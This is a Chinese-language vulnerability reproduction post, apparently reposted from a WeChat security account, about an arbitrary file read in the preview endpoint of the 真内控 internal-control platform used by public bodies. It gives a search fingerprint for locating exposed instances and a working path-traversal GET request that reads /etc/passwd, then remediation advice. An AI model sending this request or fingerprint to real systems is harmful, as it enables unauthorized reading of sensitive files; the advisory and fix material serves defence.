0x01 产品简介
真内控国产化平台是基于国产可控技术开发的内部控制管理咨询及信息化服务平台。该平台涵盖了预算绩效、支出管理、采购管理、合同管理、资产管理、基建项目管理等多个模块,为公共部门(包括政府部门、科研机构、学校、医院等)提供全方位的经济活动内部控制解决方案。真内控公司凭借其在内控领域的专业性和对国产化技术的深度应用,已经成为行业内的领先品牌,其产品在众多中央部门和省级行政事业单位中得到广泛应用。
0x02 漏洞概述
真内控国产化平台 preview接口存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。通过利用此漏洞,攻击者可能获得系统内的敏感信息,导致潜在的信息泄露风险。
0x03 网络测绘
body="js/npm.echarts.js"
0x04 漏洞复现
GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0x06 修复建议
严格检查用户提供的文件路径,确保它们符合预期的格式和规范,以防止恶意构造的路径。对文件路径进行安全处理,不要直接使用用户提供的路径,而是使用安全的方法来确定要读取的文件。进行权限控制,确保文件读取操作仅限于有权限的用户或角色,设置正确的文件和目录权限以防止未授权的访问。采用白名单控制,明确指定允许读取的文件类型和位置,限制潜在的攻击。,确保安全配置,禁用对目录遍历的支持,并定期更新和修复系统和相关组件中已知的漏洞。实施日志记录和监控机制,对文件读取操作进行审计和监测,及时发现并应对异常行为,以减小潜在的损失。
原文始发于微信公众号(知黑守白):【漏洞复现】真内控国产化平台-任意文件读取-preview
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论